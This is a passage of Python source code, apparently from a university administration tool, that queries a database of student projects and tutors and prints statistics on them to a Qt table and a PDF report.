\"\"\"SELECT tray.periodo_academico, tut.cedula_tutor, tut.nombre_tutor, tut.apellido_tutor, tray.nivel as trayecto, sec.siglas as seccion, sec.tipo_seccion, \r\n\t\t\t\t\t\t\t\t\tsec.ano_seccion, proy.codigo_proyecto, proy.numero_grupo_proyecto, proy.titulo_proyecto, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion as metodo, tdes.tipo_desarrollo, est.cedula_estudiante, \r\n\t\t\t\t\t\t\t\t\ttray.id_trayecto, sec.id_seccion, met.id_metodo, tdes.id_tipo_desarrollo \r\n\t\t\t\t\t\t\t\t\tFROM proyectos as proy INNER JOIN secciones as sec ON proy.FK_id_seccion = sec.id_seccion\r\n\t\t\t\t\t\t\t\t\tINNER JOIN trayecto as tray ON sec.FK_id_trayecto = tray.id_trayecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN metodologia as met ON proy.FK_id_metodo = met.id_metodo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tipo_de_desarrollo AS tdes ON proy.FK_id_tipo_desarrollo = tdes.id_tipo_desarrollo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN es_asesorado as esa ON proy.id_proyecto = esa.FK_id_proyecto and esa.rol = 'Tecnico Metodologico'\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tutores as tut ON tut.cedula_tutor = esa.FK_cedula_tutor\r\n\t\t\t\t\t\t\t\t\tINNER JOIN elaboran as ela ON ela.FK_id_proyecto = proy.id_proyecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN estudiante as est ON est.cedula_estudiante = ela.FK_cedula_estudiante\r\n\t\t\t\t\t\t\t\t\tWHERE tut.cedula_tutor='%i'\r\n\t\t\t\t\t\t\t\t\tORDER BY tut.cedula_tutor, sec.ano_seccion, tray.nivel, sec.siglas, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion, tdes.tipo_desarrollo;\"\"\" % (self.cedula)\r\n\t\telse:\r\n\t\t\tif self.chkPeriodo.isChecked():\r\n\t\t\t\tif self.optAnual.isChecked():\r\n\t\t\t\t\tcursor_consulta = \"\"\"SELECT tray.periodo_academico, tut.cedula_tutor, tut.nombre_tutor, tut.apellido_tutor, tray.nivel as trayecto, sec.siglas as seccion, sec.tipo_seccion, \r\n\t\t\t\t\t\t\t\t\tsec.ano_seccion, proy.codigo_proyecto, proy.numero_grupo_proyecto, proy.titulo_proyecto, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion as metodo, tdes.tipo_desarrollo, est.cedula_estudiante, \r\n\t\t\t\t\t\t\t\t\ttray.id_trayecto, sec.id_seccion, met.id_metodo, tdes.id_tipo_desarrollo \r\n\t\t\t\t\t\t\t\t\tFROM proyectos as proy INNER JOIN secciones as sec ON proy.FK_id_seccion = sec.id_seccion\r\n\t\t\t\t\t\t\t\t\tINNER JOIN trayecto as tray ON sec.FK_id_trayecto = tray.id_trayecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN metodologia as met ON proy.FK_id_metodo = met.id_metodo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tipo_de_desarrollo AS tdes ON proy.FK_id_tipo_desarrollo = tdes.id_tipo_desarrollo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN es_asesorado as esa ON proy.id_proyecto = esa.FK_id_proyecto and esa.rol = 'Tecnico Metodologico'\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tutores as tut ON tut.cedula_tutor = esa.FK_cedula_tutor\r\n\t\t\t\t\t\t\t\t\tINNER JOIN elaboran as ela ON ela.FK_id_proyecto = proy.id_proyecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN estudiante as est ON est.cedula_estudiante = ela.FK_cedula_estudiante\r\n\t\t\t\t\t\t\t\t\tWHERE tray.periodo_academico ='%i'\r\n\t\t\t\t\t\t\t\t\tORDER BY tut.cedula_tutor, sec.ano_seccion, tray.nivel, sec.siglas, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion, tdes.tipo_desarrollo;\"\"\" % (self.fechaini)\r\n\t\t\t\telse:\r\n\t\t\t\t\tcursor_consulta = \"\"\"SELECT tray.periodo_academico, tut.cedula_tutor, tut.nombre_tutor, tut.apellido_tutor, tray.nivel as trayecto, sec.siglas as seccion, sec.tipo_seccion, \r\n\t\t\t\t\t\t\t\t\tsec.ano_seccion, proy.codigo_proyecto, proy.numero_grupo_proyecto, proy.titulo_proyecto, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion as metodo, tdes.tipo_desarrollo, est.cedula_estudiante, \r\n\t\t\t\t\t\t\t\t\ttray.id_trayecto, sec.id_seccion, met.id_metodo, tdes.id_tipo_desarrollo \r\n\t\t\t\t\t\t\t\t\tFROM proyectos as proy INNER JOIN secciones as sec ON proy.FK_id_seccion = sec.id_seccion\r\n\t\t\t\t\t\t\t\t\tINNER JOIN trayecto as tray ON sec.FK_id_trayecto = tray.id_trayecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN metodologia as met ON proy.FK_id_metodo = met.id_metodo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tipo_de_desarrollo AS tdes ON proy.FK_id_tipo_desarrollo = tdes.id_tipo_desarrollo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN es_asesorado as esa ON proy.id_proyecto = esa.FK_id_proyecto and esa.rol = 'Tecnico Metodologico'\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tutores as tut ON tut.cedula_tutor = esa.FK_cedula_tutor\r\n\t\t\t\t\t\t\t\t\tINNER JOIN elaboran as ela ON ela.FK_id_proyecto = proy.id_proyecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN estudiante as est ON est.cedula_estudiante = ela.FK_cedula_estudiante\r\n\t\t\t\t\t\t\t\t\tWHERE tray.periodo_academico >= %i AND tray.periodo_academico <= %i \r\n\t\t\t\t\t\t\t\t\tORDER BY tut.cedula_tutor, sec.ano_seccion, tray.nivel, sec.siglas, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion, tdes.tipo_desarrollo;\"\"\" % (self.fechaini, self.fechafin)\r\n\t\t\telse:\r\n\t\t\t\tcursor_consulta = \"\"\"SELECT tray.periodo_academico, tut.cedula_tutor, tut.nombre_tutor, tut.apellido_tutor, tray.nivel as trayecto, sec.siglas as seccion, sec.tipo_seccion, \r\n\t\t\t\t\t\t\t\t\tsec.ano_seccion, proy.codigo_proyecto, proy.numero_grupo_proyecto, proy.titulo_proyecto, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion as metodo, tdes.tipo_desarrollo, est.cedula_estudiante, \r\n\t\t\t\t\t\t\t\t\ttray.id_trayecto, sec.id_seccion, met.id_metodo, tdes.id_tipo_desarrollo \r\n\t\t\t\t\t\t\t\t\tFROM proyectos as proy INNER JOIN secciones as sec ON proy.FK_id_seccion = sec.id_seccion\r\n\t\t\t\t\t\t\t\t\tINNER JOIN trayecto as tray ON sec.FK_id_trayecto = tray.id_trayecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN metodologia as met ON proy.FK_id_metodo = met.id_metodo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tipo_de_desarrollo AS tdes ON proy.FK_id_tipo_desarrollo = tdes.id_tipo_desarrollo\r\n\t\t\t\t\t\t\t\t\tINNER JOIN es_asesorado as esa ON proy.id_proyecto = esa.FK_id_proyecto and esa.rol = 'Tecnico Metodologico'\r\n\t\t\t\t\t\t\t\t\tINNER JOIN tutores as tut ON tut.cedula_tutor = esa.FK_cedula_tutor\r\n\t\t\t\t\t\t\t\t\tINNER JOIN elaboran as ela ON ela.FK_id_proyecto = proy.id_proyecto\r\n\t\t\t\t\t\t\t\t\tINNER JOIN estudiante as est ON est.cedula_estudiante = ela.FK_cedula_estudiante\r\n\t\t\t\t\t\t\t\t\tORDER BY tut.cedula_tutor, sec.ano_seccion, tray.nivel, sec.siglas, \r\n\t\t\t\t\t\t\t\t\tmet.descripcion, tdes.tipo_desarrollo;\"\"\"\r\n\t\tself.cursor.execute(cursor_consulta)\r\n\t\trows = []\r\n\t\tindex = -1\r\n\t\tself.IdProyecto = 0\r\n\t\tself.TotalRegistros = 0\r\n\t\tself.TotalTutores = 0\r\n\t\tself.TotalEstudiantes = 0\r\n\t\tself.TotalProyectosTutor = 0\r\n\t\tself.TotalSInformacion = 0\r\n\t\tself.TotalDWeb = 0\r\n\t\tself.TotalRedes = 0\r\n\t\tself.TotalApps = 0\r\n\t\tself.TotalGeneralProyectos = 0\r\n\t\tself.TotalGeneralEstudiantes = 0\r\n\t\tself.TotalGeneralSInformacion = 0\r\n\t\tself.TotalGeneralDWeb = 0\r\n\t\tself.TotalGeneralRedes = 0\r\n\t\tself.TotalGeneralApps = 0\r\n\t\tlv_cedula = \"\"\r\n\t\tlv_cedula_anterior = \"\"\r\n\t\tlv_ano = \"\"\r\n\t\tlv_ano_anterior = \"\"\r\n\t\tlv_trayecto = \"\"\r\n\t\tlv_trayecto_anterior = \"\"\r\n\t\tlv_seccion = \"\"\r\n\t\tlv_seccion_anterior = \"\"\r\n\t\tlv_tipo_trayecto = \"\"\r\n\t\tlv_tipo_trayecto_anterior = \"\"\r\n\t\tlv_ano_prosecucion = \"\"\r\n\t\tlv_ano_prosecucion_anterior = \"\"\r\n\t\tlv_codigo_proyecto = \"\"\r\n\t\tlv_codigo_proyecto_anterior = \"\"\r\n\t\tagregar = 0\r\n\t\tfor rows in self.cursor:\r\n\t\t\tif rows==[]:\r\n\t\t\t\tself.bdvacia = 1\r\n\t\t\telse:\r\n\t\t\t\tlv_cedula = str(rows[1])\r\n\t\t\t\tlv_nombre = str(rows[2]) + \" \" + str(rows[3])\r\n\t\t\t\tlv_ano = str(rows[0])\r\n\t\t\t\tlv_trayecto = str(rows[4])\r\n\t\t\t\tlv_seccion = str(rows[5])\r\n\t\t\t\tlv_tipo_trayecto = str(rows[6])\r\n\t\t\t\tlv_ano_prosecucion = str(rows[7])\r\n\t\t\t\tlv_codigo_proyecto = str(rows[8])\r\n\t\t\t\tself.TotalGeneralEstudiantes = self.TotalGeneralEstudiantes + 1\r\n\t\t\t\tif self.optDetallado.isChecked():\r\n\t\t\t\t\tif lv_cedula != lv_cedula_anterior or lv_ano != lv_ano_anterior or lv_trayecto != lv_trayecto_anterior or lv_seccion != lv_seccion_anterior or lv_tipo_trayecto != lv_tipo_trayecto_anterior or lv_ano_prosecucion != lv_ano_prosecucion_anterior:\r\n\t\t\t\t\t\tself.TotalProyectosTutor = 1\r\n\t\t\t\t\t\tself.TotalGeneralProyectos = self.TotalGeneralProyectos + 1\r\n\t\t\t\t\t\tself.TotalEstudiantes = 1\r\n\t\t\t\t\t\tlv_cedula_anterior = lv_cedula \r\n\t\t\t\t\t\tlv_ano_anterior = lv_ano \r\n\t\t\t\t\t\tlv_trayecto_anterior = lv_trayecto\r\n\t\t\t\t\t\tlv_seccion_anterior = lv_seccion\r\n\t\t\t\t\t\tlv_tipo_trayecto_anterior = lv_tipo_trayecto\r\n\t\t\t\t\t\tlv_ano_prosecucion_anterior = lv_ano_prosecucion \r\n\t\t\t\t\t\tagregar = 1\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.TotalEstudiantes = self.TotalEstudiantes + 1\r\n\t\t\t\t\t\tagregar = 0\r\n\t\t\t\t\t\tif lv_codigo_proyecto != lv_codigo_proyecto_anterior:\r\n\t\t\t\t\t\t\tself.TotalProyectosTutor = self.TotalProyectosTutor + 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tif lv_cedula != lv_cedula_anterior or lv_ano != lv_ano_anterior:\r\n\t\t\t\t\t\tself.TotalProyectosTutor = 1\r\n\t\t\t\t\t\tself.TotalEstudiantes = 1\r\n\t\t\t\t\t\tagregar = 1\r\n\t\t\t\t\t\tlv_cedula_anterior = lv_cedula\r\n\t\t\t\t\t\tlv_ano_anterior = lv_ano\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.TotalEstudiantes = self.TotalEstudiantes + 1\r\n\t\t\t\t\t\tagregar = 0\r\n\t\t\t\t\t\tif lv_codigo_proyecto != lv_codigo_proyecto_anterior:\r\n\t\t\t\t\t\t\tself.TotalProyectosTutor = self.TotalProyectosTutor + 1\r\n\t\t\t\tif str(rows[12]) == \"Sistema de Información\":\r\n\t\t\t\t\tlv_SInformacion = 1\r\n\t\t\t\t\tlv_DWeb = 0\r\n\t\t\t\t\tlv_Redes = 0\r\n\t\t\t\t\tlv_Apps = 0\r\n\t\t\t\telif str(rows[12]) == \"Desarrollo WEB\":\r\n\t\t\t\t\tlv_SInformacion = 0\r\n\t\t\t\t\tlv_DWeb = 1\r\n\t\t\t\t\tlv_Redes = 0\r\n\t\t\t\t\tlv_Apps = 0\r\n\t\t\t\telif str(rows[12]) == \"Implementación de Redes\":\r\n\t\t\t\t\tlv_SInformacion = 0\r\n\t\t\t\t\tlv_DWeb = 0\r\n\t\t\t\t\tlv_Redes = 1\r\n\t\t\t\t\tlv_Apps = 0\r\n\t\t\t\telse:\r\n\t\t\t\t\tlv_SInformacion = 0\r\n\t\t\t\t\tlv_DWeb = 0\r\n\t\t\t\t\tlv_Redes = 0\r\n\t\t\t\t\tlv_Apps = 1\r\n\r\n\t\t\t\tif lv_codigo_proyecto != lv_codigo_proyecto_anterior:\r\n\t\t\t\t\tself.TotalGeneralProyectos = self.TotalGeneralProyectos + 1\r\n\t\t\t\t\tlv_codigo_proyecto_anterior = lv_codigo_proyecto\r\n\t\t\t\t\tif str(rows[12]) == \"Sistema de Información\":\r\n\t\t\t\t\t\tself.TotalGeneralSInformacion = self.TotalGeneralSInformacion + 1\r\n\t\t\t\t\telif str(rows[12]) == \"Desarrollo WEB\":\r\n\t\t\t\t\t\tself.TotalGeneralDWeb = self.TotalGeneralDWeb + 1\r\n\t\t\t\t\telif str(rows[12]) == \"Implementación de Redes\":\r\n\t\t\t\t\t\tself.TotalGeneralRedes = self.TotalGeneralRedes + 1\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tself.TotalGeneralApps = self.TotalGeneralApps + 1\r\n\t\t\t\telse:\r\n\t\t\t\t\tlv_SInformacion = 0\r\n\t\t\t\t\tlv_DWeb = 0\r\n\t\t\t\t\tlv_Redes = 0\r\n\t\t\t\t\tlv_Apps = 0\r\n\r\n\t\t\t\tif agregar == 1:\r\n\t\t\t\t\tindex = index + 1\r\n\t\t\t\t\tself.TotalRegistros = self.TotalRegistros + 1\r\n\t\t\t\t\tself.tablaEstadisticas.insertRow(index)\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 0, QTableWidgetItem(lv_cedula))\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 1, QTableWidgetItem(lv_nombre))\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 2, QTableWidgetItem(lv_ano))\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 3, QTableWidgetItem(lv_trayecto))\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 4, QTableWidgetItem(lv_seccion))\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 5, QTableWidgetItem(lv_tipo_trayecto))\r\n\t\t\t\t\tself.tablaEstadisticas.setItem(index, 6, QTableWidgetItem(lv_ano_prosecucion))\r\n\t\t\t\t\tself.TotalSInformacion = lv_SInformacion\r\n\t\t\t\t\tself.TotalDWeb = lv_DWeb\r\n\t\t\t\t\tself.TotalRedes = lv_Redes\r\n\t\t\t\t\tself.TotalApps = lv_Apps\r\n\t\t\t\telse:\r\n\t\t\t\t\tself.TotalSInformacion = self.TotalSInformacion + lv_SInformacion\r\n\t\t\t\t\tself.TotalDWeb = self.TotalDWeb + lv_DWeb\r\n\t\t\t\t\tself.TotalRedes = self.TotalRedes + lv_Redes\r\n\t\t\t\t\tself.TotalApps = self.TotalApps + lv_Apps\r\n\r\n\t\t\t\tself.tablaEstadisticas.setItem(index, 7, QTableWidgetItem(str(self.TotalProyectosTutor)))\r\n\t\t\t\tself.tablaEstadisticas.setItem(index, 8, QTableWidgetItem(str(self.TotalEstudiantes)))\r\n\t\t\t\tself.tablaEstadisticas.setItem(index, 9, QTableWidgetItem(str(self.TotalSInformacion)))\r\n\t\t\t\tself.tablaEstadisticas.setItem(index, 10, QTableWidgetItem(str(self.TotalDWeb)))\r\n\t\t\t\tself.tablaEstadisticas.setItem(index, 11, QTableWidgetItem(str(self.TotalRedes)))\r\n\t\t\t\tself.tablaEstadisticas.setItem(index, 12, QTableWidgetItem(str(self.TotalApps)))\r\n\t\t\tself.TotalGeneralProyectos = self.TotalGeneralProyectos + 1\r\n\r\n\r\n\t# Rutina para generar el mes esctrito en el sistema dato que la funcion de \r\n\t# fecha retorna el mes en idioma ingles\r\n\tdef meses(self, mes):\r\n\t\tif mes=='01':\r\n\t\t\tmes_escrito = 'Enero'\r\n\t\telif mes=='02':\r\n\t\t\tmes_escrito = 'Febrero'\r\n\t\telif mes=='03':\r\n\t\t\tmes_escrito = 'Marzo'\r\n\t\telif mes=='04':\r\n\t\t\tmes_escrito = 'Abril'\r\n\t\telif mes=='05':\r\n\t\t\tmes_escrito = 'Mayo'\r\n\t\telif mes=='06':\r\n\t\t\tmes_escrito = 'Junio'\r\n\t\telif mes=='07':\r\n\t\t\tmes_escrito = 'Julio'\r\n\t\telif mes=='08':\r\n\t\t\tmes_escrito = 'Agosto'\r\n\t\telif mes=='09':\r\n\t\t\tmes_escrito = 'Septiembre'\r\n\t\telif mes=='10':\r\n\t\t\tmes_escrito = 'Octubre'\r\n\t\telif mes=='11':\r\n\t\t\tmes_escrito = 'Noviembre'\r\n\t\telse:\r\n\t\t\tmes_escrito = 'Diciembre'\r\n\t\treturn mes_escrito\r\n\r\n\t# Rutina para generar el acumulado de la estadistica a imprimir\r\n\tdef actualizaTotalesGenerales(self):\r\n\t\tself.TotalGeneralEstudiantes = self.TotalGeneralEstudiantes + self.TotalEstudiantes\r\n\t\tself.TotalGeneralProyectos = self.TotalGeneralProyectos + self.TotalProyectos\r\n\t\tself.TotalGeneralSInformacion = self.TotalGeneralSInformacion + self.TotalSInformacion\r\n\t\tself.TotalGeneralDWeb = self.TotalGeneralDWeb + self.TotalDWeb\r\n\t\tself.TotalGeneralRedes = self.TotalGeneralRedes + self.TotalRedes\r\n\t\tself.TotalGeneralApps = self.TotalGeneralApps + self.TotalApps\r\n\r\n\t# Rutina para imprimir linea impresa en el reporte de un registro\r\n\tdef imprimeLineaRegistros(self):\r\n\t\tw, h = letter\r\n\t\tif self.detallado == 1:\r\n\t\t\tif self.cedula_tutor != self.cedula_anterior:\r\n\t\t\t\tif self.cedula_anterior != \"\":\r\n\t\t\t\t\tself.cnv.line(30, h - self.linea, 760, h - self.linea)\r\n\t\t\t\t\tself.linea = self.linea + 15\r\n\t\t\t\t\tself.cnv.drawString(35, h - self.linea, \"Totales del Tutor: \")\r\n\t\t\t\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalTutorEstudiantes))\r\n\t\t\t\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalTutorProyectos))\r\n\t\t\t\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalTutorSInformacion))\r\n\t\t\t\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalTutorDWeb))\r\n\t\t\t\t\tself.cnv.drawString(500, h - self.linea, str(self.TotalTutorRedes))\r\n\t\t\t\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalTutorApps))\r\n\t\t\t\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalTutorEstudiantes))\r\n\t\t\t\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalTutorProyectos))\r\n\t\t\t\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalTutorSInformacion))\r\n\t\t\t\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalTutorDWeb))\r\n\t\t\t\t\tself.cnv.drawString(500, h - self.linea, str(self.TotalTutorRedes))\r\n\t\t\t\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalTutorApps))\r\n\t\t\t\t\tself.linea = self.linea + 20\r\n\t\t\t\t\tself.contlinea = self.contlinea + 1\r\n\t\t\t\tself.cnv.drawString(50, h - self.linea, self.nombre_tutor)\r\n\t\t\t\tself.linea = self.linea + 20\r\n\t\t\t\tself.contlinea = self.contlinea + 1\r\n\t\t\tself.cnv.drawString(35, h - self.linea, str(self.totalSecciones))\r\n\t\t\tself.cnv.drawString(60, h - self.linea, self.ano_periodo)\r\n\t\t\tself.cnv.drawString(90, h - self.linea, self.trayecto)\r\n\t\t\tself.cnv.drawString(180, h - self.linea, self.seccion)\r\n\t\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalEstudiantes))\r\n\t\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalProyectos))\r\n\t\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalSInformacion))\r\n\t\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalDWeb))\r\n\t\t\tself.cnv.drawString(500, h - self.linea, str(self.TotalRedes))\r\n\t\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalApps))\r\n\t\t\tself.totalSecciones = self.totalSecciones + 1\r\n\t\telse:\r\n\t\t\tself.cnv.drawString(35, h - self.linea, self.nombre_tutor)\r\n\t\t\tself.cnv.drawString(150, h - self.linea, str(self.totalSecciones))\r\n\t\t\tself.cnv.drawString(180, h - self.linea, self.ano_periodo)\r\n\t\t\tself.cnv.drawString(260, h - self.linea, str(self.TotalEstudiantes))\r\n\t\t\tself.cnv.drawString(315, h - self.linea, str(self.TotalProyectos))\r\n\t\t\tself.cnv.drawString(375, h - self.linea, str(self.TotalSInformacion))\r\n\t\t\tself.cnv.drawString(440, h - self.linea, str(self.TotalDWeb))\r\n\t\t\tself.cnv.drawString(500, h - self.linea, str(self.TotalRedes))\r\n\t\t\tself.cnv.drawString(550, h - self.linea, str(self.TotalApps))\r\n\t\t\tself.totalSecciones = self.totalSecciones + 1\r\n\r\n\t# Procedimiento para Generar Documento de Solvencia en PDF para impresión\r\n\tdef emitirEstadistica(self):\r\n\t\tw, h = letter\r\n\t\tlv_pagina = 1\r\n\t\tself.cnv = canvas.Canvas(self.archivo, pagesize=landscape(letter))\r\n\t\tif self.optDetallado.isChecked():\r\n\t\t\tself.detallado = 1\r\n\t\telse:\r\n\t\t\tself.detallado = 0\r\n\t\tself.imprimir_encabezado = 1\r\n\t\tself.cedula_tutor=\"\"\r\n\t\tself.nombre_tutor=\"\"\r\n\t\tself.cedula_anterior=\"\"\r\n\t\tself.TotalRegistros = 0\r\n\t\tself.TotalTutores = 0\r\n\t\tself.TotalEstudiantes = 0\r\n\t\tself.TotalProyectos = 0\r\n\t\tself.TotalProyectosTutor = 0\r\n\t\tself.TotalRUP = 0\r\n\t\tself.TotalXP = 0\r\n\t\tself.TotalDMovil = 0\r\n\t\tself.TotalOtrosMetodos = 0\r\n\t\tself.TotalSInformacion = 0\r\n\t\tself.TotalDWeb = 0\r\n\t\tself.TotalRedes = 0\r\n\t\tself.TotalApps = 0\r\n\t\tself.TotalTutorEstudiantes = 0\r\n\t\tself.TotalTutorProyectos = 0\r\n\t\tself.TotalTutorRUP = 0\r\n\t\tself.TotalTutorXP = 0\r\n\t\tself.TotalTutorDMovil = 0\r\n\t\tself.TotalTutorOtrosMetodos = 0\r\n\t\tself.TotalTutorSInformacion = 0\r\n\t\tself.TotalTutorDWeb = 0\r\n\t\tself.TotalTutorRedes = 0\r\n\t\tself.TotalTutorApps = 0\r\n\t\tself.TotalGeneralEstudiantes = 0\r\n\t\tself.TotalGeneralProyectos = 0\r\n\t\tself.TotalGeneralRUP = 0\r\n\t\tself.TotalGeneralXP = 0\r\n\t\tself.TotalGeneralDMovil = 0\r\n\t\tself.TotalGeneralOtrosMetodos = 0\r\n\t\tself.TotalGeneralSInformacion = 0\r\n\t\tself.TotalGeneralDWeb = 0\r\n\t\tself.TotalGeneralRedes = 0\r\n\t\tself.TotalGeneralApps = 0\r\n\t\tself.RegistroActual = 0\r\n\t\t\r\n\t\tself.ano_periodo = \"\"\r\n\t\tself.trayecto = \"\"\r\n\t\tself.seccion = \"\"\r\n\t\tself.tipo_trayecto = \"\"\r\n\t\tself.ano_prosecucion = \"\"\r\n\r\n\t\tindex = self.tablaEstadisticas.rowCount()\r\n\t\twhile self.RegistroActual < index:\r\n\t\t\tself.cedula_tutor = self.tablaEstadisticas.item(self.RegistroActual, 0).text()\r\n\t\t\tself.nombre_tutor = self.tablaEstadisticas.item(self.RegistroActual, 1).text()\r\n\t\t\tself.ano_periodo = self.tablaEstadisticas.item(self.RegistroActual, 2).text()\r\n\t\t\tself.trayecto = self.tablaEstadisticas.item(self.RegistroActual, 3).text()\r\n\t\t\tself.seccion = self.tablaEstadisticas.item(self.RegistroActual, 4).text()\r\n\t\t\tself.tipo_trayecto = self.tablaEstadisticas.item(self.RegistroActual, 5).text()\r\n\t\t\tself.ano_prosecucion = self.tablaEstadisticas.item(self.RegistroActual, 6).text()\r\n\t\t\tself.TotalProyectos = int(self.tablaEstadisticas.item(self.RegistroActual, 7).text())\r\n\t\t\tself.TotalEstudiantes = int(self.tablaEstadisticas.item(self.RegistroActual, 8).text())\r\n\t\t\tself.TotalSInformacion = int(self.tablaEstadisticas.item(self.RegistroActual, 9).text())\r\n\t\t\tself.TotalDWeb = int(self.tablaEstadisticas.item(self.RegistroActual, 10).text())\r\n\t\t\tself.TotalRedes = int(self.tablaEstadisticas.item(self.RegistroActual, 11).text())\r\n\t\t\tself.TotalApps = int(self.tablaEstadisticas.item(self.RegistroActual, 12).text())\r\n\t\t\tif self.imprimir_encabezado == 1:\r\n\t\t\t\tself.cnv.drawImage(\"./img/Membrete-UPTJAA.jpg\", 50, h - 280, width=700, height=60)\r\n\t\t\t\tself.cnv.setLineWidth(.3)\r\n\t\t\t\tself.cnv.setFont(\"Helvetica\", 10, leading = None)\r\n\t\t\t\tself.cnv.drawString(50, h - 300, \"FECHA: \" + self.fecha1)\r\n\t\t\t\tself.cnv.drawString(680, h - 300, \"PAGINA: \" + str(lv_pagina))\r\n\t\t\t\tself.cnv.setFont(\"Times-Roman\", 14, leading = None)\r\n\t\t\t\tself.cnv.drawString(200, h - 320, \"ESTADISTICAS DE PROYECTOS DEL PNF DE INFORMATICA\")\r\n\t\t\t\tself.cnv.setFont(\"Helvetica\", 10, leading = None)\r\n\t\t\t\tif self.detallado == 1:\r\n\t\t\t\t\tself.cnv.drawString(60, h - 340, \"Periodo\")\r\n\t\t\t\t\tself.cnv.drawString(235, h - 340, \"Cantidad\")\r\n\t\t\t\t\tself.cnv.drawString(295, h - 340, \"Proyectos\")\r\n\t\t\t\t\tself.cnv.drawString(355, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(430, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(490, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(540, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(35, h - 350, \"#\")\r\n\t\t\t\t\tself.cnv.drawString(50, h - 350, \"Academico\")\r\n\t\t\t\t\tself.cnv.drawString(110, h - 350, \"Trayecto\")\r\n\t\t\t\t\tself.cnv.drawString(175, h - 350, \"Seccion\")\r\n\t\t\t\t\tself.cnv.drawString(235, h - 350, \"Estudiantes\")\r\n\t\t\t\t\tself.cnv.drawString(295, h - 350, \"Recibidos\")\r\n\t\t\t\t\tself.cnv.drawString(355, h - 350, \"S.Informacion\")\r\n\t\t\t\t\tself.cnv.drawString(430, h - 350, \"Des. Web\")\r\n\t\t\t\t\tself.cnv.drawString(490, h - 350, \"Redes\")\r\n\t\t\t\t\tself.cnv.drawString(540, h - 350, \"APPS\")\r\n\t\t\t\t\tself.cnv.setLineWidth(.3)\r\n\t\t\t\t\tself.cnv.line(30,h - 352,760,h - 352)\r\n\t\t\t\t\tself.cnv.line(30,h - 354,760,h - 354)\r\n\t\t\t\t\tself.TotalTutores = self.TotalTutores + 1\r\n\t\t\t\t\tself.totalSecciones = 1\r\n\t\t\t\t\tself.linea = 370\r\n\t\t\t\t\tself.contlinea = 1\r\n\t\t\t\telse:\r\n\t\t\t\t\t#c.drawString(50, h - 360, \"Cedula: \" + lv_cedula_tutor)\r\n\t\t\t\t\tself.cnv.drawString(185, h - 340, \"Periodo\")\r\n\t\t\t\t\tself.cnv.drawString(235, h - 340, \"Cantidad\")\r\n\t\t\t\t\tself.cnv.drawString(290, h - 340, \"Proyectos\")\r\n\t\t\t\t\tself.cnv.drawString(350, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(425, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(488, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(535, h - 340, \"Total\")\r\n\t\t\t\t\tself.cnv.drawString(35, h - 350, \"Tutor Academico\") \r\n\t\t\t\t\tself.cnv.drawString(120, h - 350, \"Secciones\")\r\n\t\t\t\t\tself.cnv.drawString(175, h - 350, \"Academico\")\r\n\t\t\t\t\tself.cnv.drawString(230, h - 350, \"Estudiantes\")\r\n\t\t\t\t\tself.cnv.drawString(290, h - 350, \"Recibidos\")\r\n\t\t\t\t\tself.cnv.drawString(350, h - 350, \"S.Informacion\")\r\n\t\t\t\t\tself.cnv.drawString(425, h - 350, \"Des. Web\")\r\n\t\t\t\t\tself.cnv.drawString(488, h - 350, \"Redes\")\r\n\t\t\t\t\tself.cnv.drawString(535, h - 350, \"APPS\")\r\n\t\t\t\t\tself.cnv.setLineWidth(.3)\r\n\t\t\t\t\tself.cnv.line(30,h - 352,760,h - 352)\r\n\t\t\t\t\tself.cnv.line(30,h - 354,760,h - 354)\r\n\t\t\t\t\tself.TotalTutores = self.TotalTutores + 1\r\n\t\t\t\t\tself.totalSecciones = 